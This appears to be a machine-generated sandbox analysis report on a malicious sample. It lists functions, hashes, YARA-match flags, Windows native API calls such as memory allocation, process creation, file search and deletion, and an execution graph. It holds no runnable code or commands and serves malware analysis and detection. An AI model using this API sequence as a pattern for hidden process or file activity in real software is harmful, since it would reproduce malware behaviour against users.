                                                                                                                Function 014E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction ID: e562c5645020a21c97786a464dec81ae18f9649b3cb806437db67194f44f9f9c
                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction Fuzzy Hash: 54918E71E002169AEF24DF6DC898ABFBBE5AF44333F14461BE955A73E0E73089418791
                                                                                                                Function 014A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                                                                • Instruction ID: fea832b91ca3c4f940c301dcf20cd4802c4673de063770b359773e8268aaebfd
                                                                                                                • Opcode Fuzzy Hash: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                                                                • Instruction Fuzzy Hash: AD811D71D002699BDB35CF94CC44BEEB6B4BB58714F0545EAEA19BB290D7305E84CF60
                                                                                                                Function 0152CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0152CFBD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                • String ID: @$@4rw@4rw
                                                                                                                • API String ID: 4062629308-2979693914
                                                                                                                • Opcode ID: 6ef07abdfc7e669893fba1e551832f0a2b8979669deb558570f129bfc3d4a03d
                                                                                                                • Instruction ID: 4f07a312969c67f5539c442059981f0a2d62aa4bd5e22dd6aa8a343ba299292f
                                                                                                                • Opcode Fuzzy Hash: 6ef07abdfc7e669893fba1e551832f0a2b8979669deb558570f129bfc3d4a03d
                                                                                                                • Instruction Fuzzy Hash: 3441B172900225DFDB219FAAC844AADBBF8FF65750F01442EE914DF2A4E774D805CB61

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.4%
                                                                                                                Dynamic/Decrypted Code Coverage:4.4%
                                                                                                                Signature Coverage:2.3%
                                                                                                                Total number of Nodes:435
                                                                                                                Total number of Limit Nodes:71
                                                                                                                execution_graph 101557 81ba80 101560 83ba50 101557->101560 101559 81d0f1 101563 839b90 101560->101563 101562 83ba81 101562->101559 101564 839c22 101563->101564 101566 839bb8 101563->101566 101565 839c35 NtAllocateVirtualMemory 101564->101565 101565->101562 101566->101562 101567 82138b 101568 821393 PostThreadMessageW 101567->101568 101569 82139f 101567->101569 101568->101569 101570 822d08 101573 826840 101570->101573 101572 822d33 101575 826873 101573->101575 101574 826897 101574->101572 101575->101574 101580 8395c0 101575->101580 101577 8268ba 101577->101574 101584 839a40 101577->101584 101579 82693c 101579->101572 101581 8395da 101580->101581 101587 47d2ca0 LdrInitializeThunk 101581->101587 101582 839603 101582->101577 101585 839a5d 101584->101585 101586 839a6b NtClose 101585->101586 101586->101579 101587->101582 101589 819f10 101591 81a30a 101589->101591 101592 81a797 101591->101592 101593 83b740 101591->101593 101594 83b766 101593->101594 101599 814180 101594->101599 101596 83b772 101597 83b7ab 101596->101597 101602 835be0 101596->101602 101597->101592 101606 8237b0 101599->101606 101601 81418d 101601->101596 101603 835c42 101602->101603 101605 835c4f 101603->101605 101630 821f60 101603->101630 101605->101597 101607 8237cd 101606->101607 101609 8237e0 101607->101609 101610 83a470 101607->101610 101609->101601 101612 83a48a 101610->101612 101611 83a4b9 101611->101609 101612->101611 101617 8390e0 101612->101617 101618 8390fd 101617->101618 101624 47d2c0a 101618->101624 101619 839126 101621 83bae0 101619->101621 101627 839d90 101621->101627 101623 83a52f 101623->101609 101625 47d2c1f LdrInitializeThunk 101624->101625 101626 47d2c11 101624->101626 101625->101619 101626->101619 101628 839daa 101627->101628 101629 839db8 RtlFreeHeap 101628->101629 101629->101623 101631 821f98 101630->101631 101646 828410 101631->101646 101633 821fa0 101634 822286 101633->101634 101657 83bbc0 101633->101657 101634->101605 101636 821fb6 101637 83bbc0 RtlAllocateHeap 101636->101637 101638 821fc7 101637->101638 101639 83bbc0 RtlAllocateHeap 101638->101639 101640 821fd8 101639->101640 101645 822075 101640->101645 101668 826fa0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101640->101668 101643 822232 101664 838520 101643->101664 101660 824af0 101645->101660 101647 82843c 101646->101647 101669 828300 101647->101669 101650 82849d 101650->101633 101651 828474 101651->101633 101652 828469 101652->101651 101654 839a40 NtClose 101652->101654 101653 828481 101653->101650 101655 839a40 NtClose 101653->101655 101654->101651 101656 828493 101655->101656 101656->101633 101680 839d40 101657->101680 101659 83bbd8 101659->101636 101661 824b14 101660->101661 101662 824b50 LdrLoadDll 101661->101662 101663 824b1b 101661->101663 101662->101663 101663->101643 101665 838582 101664->101665 101667 83858f 101665->101667 101683 8222a0 101665->101683 101667->101634 101668->101645 101670 82831a 101669->101670 101674 8283f6 101669->101674 101675 839170 101670->101675 101673 839a40 NtClose 101673->101674 101674->101652 101674->101653 101676 83918d 101675->101676 101679 47d35c0 LdrInitializeThunk 101676->101679 101677 8283ea 101677->101673 101679->101677 101681 839d5d 101680->101681 101682 839d6b RtlAllocateHeap 101681->101682 101682->101659 101686 8222c0 101683->101686 101699 8286e0 101683->101699 101685 822817 101685->101667 101686->101685 101703 831720 101686->101703 101689 8224da 101711 83ccb0 101689->101711 101690 82231e 101690->101685 101706 83cb80 101690->101706 101693 8224ef 101695 82253f 101693->101695 101717 820dc0 101693->101717 101695->101685 101696 820dc0 LdrInitializeThunk 101695->101696 101720 828680 101695->101720 101696->101695 101697 822693 101697->101695 101698 828680 LdrInitializeThunk 101697->101698 101698->101697 101700 8286ed 101699->101700 101701 828715 101700->101701 101702 82870e SetErrorMode 101700->101702 101701->101686 101702->101701 101704 83ba50 NtAllocateVirtualMemory 101703->101704 101705 831741 101704->101705 101705->101690 101707 83cb90 101706->101707 101708 83cb96 101706->101708 101707->101689 101709 83bbc0 RtlAllocateHeap 101708->101709 101710 83cbbc 101709->101710 101710->101689 101712 83cc20 101711->101712 101713 83bbc0 RtlAllocateHeap 101712->101713 101716 83cc7d 101712->101716 101714 83cc5a 101713->101714 101715 83bae0 RtlFreeHeap 101714->101715 101715->101716 101716->101693 101724 839cb0 101717->101724 101721 828693 101720->101721 101729 838fe0 101721->101729 101723 8286be 101723->101695 101725 839ccd 101724->101725 101728 47d2c70 LdrInitializeThunk 101725->101728 101726 820de2 101726->101697 101728->101726 101730 83905b 101729->101730 101731 839008 101729->101731 101734 47d2dd0 LdrInitializeThunk 101730->101734 101731->101723 101732 83907d 101732->101723 101734->101732 101735 827890 101736 8278a8 101735->101736 101738 827902 101735->101738 101736->101738 101739 82b800 101736->101739 101740 82b809 101739->101740 101741 82ba5f 101740->101741 101766 839e10 101740->101766 101741->101738 101743 82b8a2 101743->101741 101744 83ccb0 2 API calls 101743->101744 101745 82b8c1 101744->101745 101745->101741 101746 82b998 101745->101746 101747 8390e0 LdrInitializeThunk 101745->101747 101748 8260d0 LdrInitializeThunk 101746->101748 101752 82b9b7 101746->101752 101749 82b923 101747->101749 101748->101752 101749->101746 101750 82b92c 101749->101750 101750->101741 101760 82b95e 101750->101760 101761 82b980 101750->101761 101769 8260d0 101750->101769 101751 82ba47 101754 828680 LdrInitializeThunk 101751->101754 101752->101751 101773 838c50 101752->101773 101753 828680 LdrInitializeThunk 101758 82b98e 101753->101758 101759 82ba55 101754->101759 101758->101738 101759->101738 101788 834d60 LdrInitializeThunk 101760->101788 101761->101753 101762 82ba1e 101778 838d00 101762->101778 101764 82ba38 101783 838e60 101764->101783 101767 839e2d 101766->101767 101768 839e3e CreateProcessInternalW 101767->101768 101768->101743 101770 8260d6 101769->101770 101772 82610e 101770->101772 101789 8392a0 101770->101789 101772->101760 101774 838cca 101773->101774 101775 838c78 101773->101775 101795 47d39b0 LdrInitializeThunk 101774->101795 101775->101762 101776 838cec 101776->101762 101779 838d7d 101778->101779 101780 838d2b 101778->101780 101796 47d4340 LdrInitializeThunk 101779->101796 101780->101764 101781 838d9f 101781->101764 101784 838eda 101783->101784 101786 838e88 101783->101786 101797 47d2fb0 LdrInitializeThunk 101784->101797 101785 838efc 101785->101751 101786->101751 101788->101761 101790 839351 101789->101790 101792 8392cf 101789->101792 101794 47d2d10 LdrInitializeThunk 101790->101794 101791 839393 101791->101772 101792->101772 101794->101791 101795->101776 101796->101781 101797->101785 101798 82cb90 101800 82cbb9 101798->101800 101799 82ccbd 101800->101799 101801 82cc63 FindFirstFileW 101800->101801 101801->101799 101803 82cc7e 101801->101803 101802 82cca4 FindNextFileW 101802->101803 101804 82ccb6 FindClose 101802->101804 101803->101802 101804->101799 101805 827310 101806 82733a 101805->101806 101809 8284b0 101806->101809 101808 827364 101810 8284cd 101809->101810 101816 8391c0 101810->101816 101812 82851d 101813 828524 101812->101813 101814 8392a0 LdrInitializeThunk 101812->101814 101813->101808 101815 82854d 101814->101815 101815->101808 101817 83925b 101816->101817 101818 8391eb 101816->101818 101821 47d2f30 LdrInitializeThunk 101817->101821 101818->101812 101819 839291 101819->101812 101821->101819 101904 826150 101905 828680 LdrInitializeThunk 101904->101905 101906 826180 101905->101906 101908 8261ac 101906->101908 101909 828600 101906->101909 101910 828644 101909->101910 101915 828665 101910->101915 101916 838db0 101910->101916 101912 828655 101913 828671 101912->101913 101914 839a40 NtClose 101912->101914 101913->101906 101914->101915 101915->101906 101917 838e2a 101916->101917 101919 838dd8 101916->101919 101921 47d4650 LdrInitializeThunk 101917->101921 101918 838e4c 101918->101912 101919->101912 101921->101918 101822 839090 101823 8390ad 101822->101823 101826 47d2df0 LdrInitializeThunk 101823->101826 101824 8390d2 101826->101824 101832 838f10 101833 838f9f 101832->101833 101834 838f3b 101832->101834 101837 47d2ee0 LdrInitializeThunk 101833->101837 101835 838fcd 101837->101835 101927 839750 101928 839804 101927->101928 101930 83977c 101927->101930 101929 839817 NtCreateFile 101928->101929 101931 836650 101932 8366aa 101931->101932 101933 8366b7 101932->101933 101935 834050 101932->101935 101936 83ba50 NtAllocateVirtualMemory 101935->101936 101938 834091 101936->101938 101937 83419e 101937->101933 101938->101937 101939 824af0 LdrLoadDll 101938->101939 101941 8340d7 101939->101941 101940 834120 Sleep 101940->101941 101941->101937 101941->101940 101942 831d50 101943 831d6c 101942->101943 101944 831d94 101943->101944 101945 831da8 101943->101945 101947 839a40 NtClose 101944->101947 101946 839a40 NtClose 101945->101946 101948 831db1 101946->101948 101949 831d9d 101947->101949 101952 83bc00 RtlAllocateHeap 101948->101952 101951 831dbc 101952->101951 101840 8236a3 101841 828300 2 API calls 101840->101841 101842 8236b3 101841->101842 101843 8236cf 101842->101843 101844 839a40 NtClose 101842->101844 101844->101843 101845 82a1a0 101847 82a1af 101845->101847 101846 82a1b6 101847->101846 101848 83bae0 RtlFreeHeap 101847->101848 101848->101846 101953 82b2e0 101958 82aff0 101953->101958 101955 82b2ed 101972 82ac60 101955->101972 101957 82b303 101959 82b015 101958->101959 101983 8288f0 101959->101983 101962 82b163 101962->101955 101964 82b17a 101964->101955 101965 82b171 101965->101964 101967 82b267 101965->101967 102002 82a6b0 101965->102002 101969 82b2ca 101967->101969 102011 82aa20 101967->102011 101970 83bae0 RtlFreeHeap 101969->101970 101971 82b2d1 101970->101971 101971->101955 101973 82ac76 101972->101973 101980 82ac81 101972->101980 101974 83bbc0 RtlAllocateHeap 101973->101974 101974->101980 101975 82aca8 101975->101957 101976 8288f0 GetFileAttributesW 101976->101980 101977 82afc2 101978 82afdb 101977->101978 101979 83bae0 RtlFreeHeap 101977->101979 101978->101957 101979->101978 101980->101975 101980->101976 101980->101977 101981 82a6b0 RtlFreeHeap 101980->101981 101982 82aa20 RtlFreeHeap 101980->101982 101981->101980 101982->101980 101984 828911 101983->101984 101985 828918 GetFileAttributesW 101984->101985 101986 828923 101984->101986 101985->101986 101986->101962 101987 833930 101986->101987 101988 83393e 101987->101988 101989 833945 101987->101989 101988->101965 101990 824af0 LdrLoadDll 101989->101990 101991 83397a 101990->101991 101992 833989 101991->101992 102015 8333f0 LdrLoadDll 101991->102015 101994 83bbc0 RtlAllocateHeap 101992->101994 101998 833b34 101992->101998 101995 8339a2 101994->101995 101996 833b2a 101995->101996 101995->101998 101999 8339be 101995->101999 101997 83bae0 RtlFreeHeap 101996->101997 101996->101998 101997->101998 101998->101965 101999->101998 102000 83bae0 RtlFreeHeap 101999->102000 102001 833b1e 102000->102001 102001->101965 102003 82a6d6 102002->102003 102016 82e100 102003->102016 102005 82a748 102007 82a8d0 102005->102007 102009 82a766 102005->102009 102006 82a8b5 102006->101965 102007->102006 102008 82a570 RtlFreeHeap 102007->102008 102008->102007 102009->102006 102021 82a570 102009->102021 102012 82aa46 102011->102012 102013 82e100 RtlFreeHeap 102012->102013 102014 82aacd 102013->102014 102014->101967 102015->101992 102018 82e124 102016->102018 102017 82e131 102017->102005 102018->102017 102019 83bae0 RtlFreeHeap 102018->102019 102020 82e174 102019->102020 102020->102005 102022 82a58d 102021->102022 102025 82e190 102022->102025 102024 82a693 102024->102009 102026 82e1b4 102025->102026 102027 82e25e 102026->102027 102028 83bae0 RtlFreeHeap 102026->102028 102027->102024 102028->102027 101849 8399a0 101850 8399cb 101849->101850 101851 839a17 101849->101851 101852 839a2a NtDeleteFile 101851->101852 102029 8320e0 102031 8320f9 102029->102031 102030 832144 102032 83bae0 RtlFreeHeap 102030->102032 102031->102030 102034 832187 102031->102034 102036 83218c 102031->102036 102033 832154 102032->102033 102035 83bae0 RtlFreeHeap 102034->102035 102035->102036 102037 83cbe0 102038 83bae0 RtlFreeHeap 102037->102038 102039 83cbf5 102038->102039 101858 828da7 101860 828daa 101858->101860 101859 828d61 101860->101859 101862 827630 101860->101862 101863 827646 101862->101863 101865 82767f 101862->101865 101863->101865 101866 8274a0 LdrLoadDll 101863->101866 101865->101859 101866->101865 101867 47d2ad0 LdrInitializeThunk 101868 81e2b1 101871 83ba50 NtAllocateVirtualMemory 101868->101871 101869 81e2e2 101870 81e286 101870->101868 101870->101869 101871->101870 101872 819eb0 101874 819ebf 101872->101874 101873 819f00 101874->101873 101875 819eed CreateThread 101874->101875 101876 8276b0 101877 8276cc 101876->101877 101884 82771f 101876->101884 101879 839a40 NtClose 101877->101879 101877->101884 101878 827851 101880 8276e7 101879->101880 101886 826ad0 NtClose LdrInitializeThunk LdrInitializeThunk 101880->101886 101882 82782e 101882->101878 101888 826ca0 NtClose LdrInitializeThunk LdrInitializeThunk 101882->101888 101884->101878 101887 826ad0 NtClose LdrInitializeThunk LdrInitializeThunk 101884->101887 101886->101884 101887->101882 101888->101878 101889 822830 101890 8390e0 LdrInitializeThunk 101889->101890 101891 822866 101890->101891 101894 839ad0 101891->101894 101893 82287b 101895 839af8 101894->101895 101896 839b5c 101894->101896 101895->101893 101899 47d2e80 LdrInitializeThunk 101896->101899 101897 839b8a 101897->101893 101899->101897 102040 82fdf0 102041 82fe54 102040->102041 102042 826840 2 API calls 102041->102042 102044 82ff87 102042->102044 102043 82ff8e 102044->102043 102069 826950 102044->102069 102046 830133 102047 83000a 102047->102046 102048 830142 102047->102048 102073 82fbd0 102047->102073 102049 839a40 NtClose 102048->102049 102051 83014c 102049->102051 102052 830046 102052->102048 102053 830051 102052->102053 102054 83bbc0 RtlAllocateHeap 102053->102054 102055 83007a 102054->102055 102056 830083 102055->102056 102057 830099 102055->102057 102058 839a40 NtClose 102056->102058 102082 82fac0 CoInitialize 102057->102082 102060 83008d 102058->102060 102061 8300a7 102085 839530 102061->102085 102063 830122 102064 839a40 NtClose 102063->102064 102065 83012c 102064->102065 102066 83bae0 RtlFreeHeap 102065->102066 102066->102046 102067 8300c5 102067->102063 102068 839530 LdrInitializeThunk 102067->102068 102068->102067 102070 826975 102069->102070 102089 8393e0 102070->102089 102074 82fbec 102073->102074 102075 824af0 LdrLoadDll 102074->102075 102077 82fc0a 102075->102077 102076 82fc13 102076->102052 102077->102076 102078 824af0 LdrLoadDll 102077->102078 102079 82fcde 102078->102079 102080 824af0 LdrLoadDll 102079->102080 102081 82fd38 102079->102081 102080->102081 102081->102052 102083 82fb25 102082->102083 102084 82fbbb CoUninitialize 102083->102084 102084->102061 102086 83954a 102085->102086 102094 47d2ba0 LdrInitializeThunk 102086->102094 102087 839577 102087->102067 102090 8393fd 102089->102090 102093 47d2c60 LdrInitializeThunk 102090->102093 102091 8269e9 102091->102047 102093->102091 102094->102087 101900 8398b0 101901 839954 101900->101901 101903 8398d8 101900->101903 101902 839967 NtReadFile 101901->101902 102095 8306f0 102096 830713 102095->102096 102097 824af0 LdrLoadDll 102096->102097 102098 830737 102097->102098

                                                                                                                Executed Functions

                                                                                                                Function 00819F10 Relevance: 29.2, Strings: 23, Instructions: 450COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 27 819f10-81a308 28 81a319-81a325 27->28 29 81a30a-81a313 27->29 30 81a343-81a34d 28->30 31 81a327-81a333 28->31 29->28 32 81a35e-81a36a 30->32 33 81a341 31->33 34 81a335-81a33b 31->34 35 81a381-81a388 32->35 36 81a36c-81a37f 32->36 33->29 34->33 37 81a38a-81a3ad 35->37 38 81a3af 35->38 36->32 37->35 40 81a3b6-81a3bd 38->40 41 81a3e4-81a3fc 40->41 42 81a3bf-81a3e2 40->42 43 81a40d-81a416 41->43 42->40 44 81a423-81a42c 43->44 45 81a418-81a421 43->45 47 81a6c2-81a6c6 44->47 48 81a432-81a43c 44->48 45->43 50 81a6e9-81a6f5 47->50 51 81a6c8-81a6e7 47->51 49 81a44d-81a456 48->49 54 81a458-81a46a 49->54 55 81a46c-81a46f 49->55 52 81a6f7-81a718 50->52 53 81a71a-81a721 50->53 51->47 52->50 56 81a870-81a87a 53->56 57 81a727-81a72e 53->57 54->49 58 81a475-81a481 55->58 60 81a730-81a746 57->60 61 81a753-81a75d 57->61 62 81a483-81a4a4 58->62 63 81a4a6-81a4aa 58->63 64 81a751 60->64 65 81a748-81a74e 60->65 66 81a76e-81a77a 61->66 62->58 67 81a4d8-81a4f1 63->67 68 81a4ac-81a4d6 63->68 64->57 65->64 69 81a792 call 83b740 66->69 70 81a77c-81a785 66->70 67->67 71 81a4f3-81a502 67->71 68->63 81 81a797-81a7b0 69->81 72 81a790 70->72 73 81a787-81a78d 70->73 75 81a571-81a57b 71->75 76 81a504-81a50b 71->76 80 81a75f-81a768 72->80 73->72 79 81a58c-81a598 75->79 77 81a544-81a54b 76->77 78 81a50d-81a51d 76->78 84 81a54d-81a56a 77->84 85 81a56c 77->85 82 81a51f-81a528 78->82 83 81a52e-81a542 78->83 86 81a5b7-81a5c1 79->86 87 81a59a-81a5aa 79->87 80->66 81->81 88 81a7b2-81a7bc 81->88 82->83 83->76 84->77 85->47 92 81a5d2-81a5de 86->92 90 81a5b5 87->90 91 81a5ac-81a5b2 87->91 89 81a7cd-81a7d7 88->89 93 81a7d9-81a829 89->93 94 81a82b-81a835 89->94 90->79 91->90 96 81a5f1-81a602 92->96 97 81a5e0-81a5ef 92->97 93->89 101 81a846-81a852 94->101 98 81a60d-81a614 96->98 97->92 102 81a653-81a65f 98->102 103 81a616-81a651 98->103 101->56 104 81a854-81a860 101->104 105 81a661-81a67c 102->105 106 81a67e-81a688 102->106 103->98 108 81a862-81a868 104->108 109 81a86e 104->109 105->102 110 81a699-81a6a5 106->110 108->109 109->101 112 81a6a7-81a6b0 110->112 113 81a6bd 110->113 114 81a6b2-81a6b8 112->114 115 81a6bb 112->115 113->44 114->115 115->110
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !~$"z$$$*$-$$0$5$8xyF$@0$F$G'$M$O$af$f$m$s$v$yF$|$*$@$a
                                                                                                                • API String ID: 0-1104866437
                                                                                                                • Opcode ID: fa64b429fff650e51f0a7acf9d5dd1069ab5e60d8bf8720501680845ef1f6f25
                                                                                                                • Instruction ID: 8b9a8295e4b97d33548cc376b40c873e87ec4af5f8da18d28adc86058e790bfe
                                                                                                                • Opcode Fuzzy Hash: fa64b429fff650e51f0a7acf9d5dd1069ab5e60d8bf8720501680845ef1f6f25
                                                                                                                • Instruction Fuzzy Hash: 67427DB0D06228CBEB68CF44C9947DDBBB6FF45308F1081D9C509AA290DBB55AC9CF56
                                                                                                                Function 0082CB90 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0082CC74
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0082CCAF
                                                                                                                • FindClose.KERNELBASE(?), ref: 0082CCBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 0cf4fac8b3c0f3d65cb5c9fbdc11fc9a33a5724dce5cef26e65f56e313b34315
                                                                                                                • Instruction ID: 823926ee341b0830a8c2e105cca67d7aeacbb903a2abc57ab2a2c253b9c014e0
                                                                                                                • Opcode Fuzzy Hash: 0cf4fac8b3c0f3d65cb5c9fbdc11fc9a33a5724dce5cef26e65f56e313b34315
                                                                                                                • Instruction Fuzzy Hash: 3E316FB1A003587BDB20DBA4DC85FFF777CEF84704F144559BA09E6181DA70AA848BA1
                                                                                                                Function 00839750 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00839848
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 3bef618b96a2b972b0ecd4014bd13abf0775ca340cb735c52f419bd135e5a95e
                                                                                                                • Instruction ID: 94cfdd2fd34e02258ff9caa6d554d8499c796caf2fd56918b6f18f6388c0dd3c
                                                                                                                • Opcode Fuzzy Hash: 3bef618b96a2b972b0ecd4014bd13abf0775ca340cb735c52f419bd135e5a95e
                                                                                                                • Instruction Fuzzy Hash: AD31D2B5A01608AFCB14DF98D981EEFB7B9EF8C710F108219F919A7344D770A9118BA5
                                                                                                                Function 008398B0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00839990
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 7b2bb91b12148946a7475c37ddf9922fca461394f54bde61227a64b974e9941a
                                                                                                                • Instruction ID: a36ad7977dae1170029d302fa38e1853088afe2c7348158d58013c7a1ae518d8
                                                                                                                • Opcode Fuzzy Hash: 7b2bb91b12148946a7475c37ddf9922fca461394f54bde61227a64b974e9941a
                                                                                                                • Instruction Fuzzy Hash: 4D31F9B5A00208AFDB14DF98D881EDFB7B9EF88710F108219FD19E7340D770A9158BA5
                                                                                                                Function 00839B90 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(0082231E,?,0083858F,00000000,00000004,00003000,?,?,?,?,?,0083858F,0082231E,0083BA81,0083858F,45C75651), ref: 00839C52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: dd2310b82a309aade04c16b49507b91864c37ad5edb7370376e069164ab0fe86
                                                                                                                • Instruction ID: 55755b6750fca7b91e3b020e14f96a1207774d9906435b8de3cc83d5d40d7487
                                                                                                                • Opcode Fuzzy Hash: dd2310b82a309aade04c16b49507b91864c37ad5edb7370376e069164ab0fe86
                                                                                                                • Instruction Fuzzy Hash: 07212BB5A00648AFDB14DF98DC41EEFB7B9EF88710F008119FA19A7241D770A9158BA6
                                                                                                                Function 008399A0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: a12b89487e862537019f0aabac514e5e028b2ee599d2fad5dc8d9f1ba142960f
                                                                                                                • Instruction ID: 82ca6d940ad1e75afacd1d7b6d34da5fe0e7dfa52e70bcffa626c6f0ae167bbf
                                                                                                                • Opcode Fuzzy Hash: a12b89487e862537019f0aabac514e5e028b2ee599d2fad5dc8d9f1ba142960f
                                                                                                                • Instruction Fuzzy Hash: EC11A3716006047FD610EBA8DC02FEB736CEF85710F008109FA19E7281E7717A1587E6
                                                                                                                Function 00839A40 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00839A74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction ID: 6d060992032a8035706dc39b2b6aab27f3e9e4e6a9c583c44b10b806e0d1d0f0
                                                                                                                • Opcode Fuzzy Hash: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction Fuzzy Hash: 5FE08C322002047BC620EA5EEC01F9BB76CEFC5B20F008419FA0CE7242C671B90587FA
                                                                                                                Function 047D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
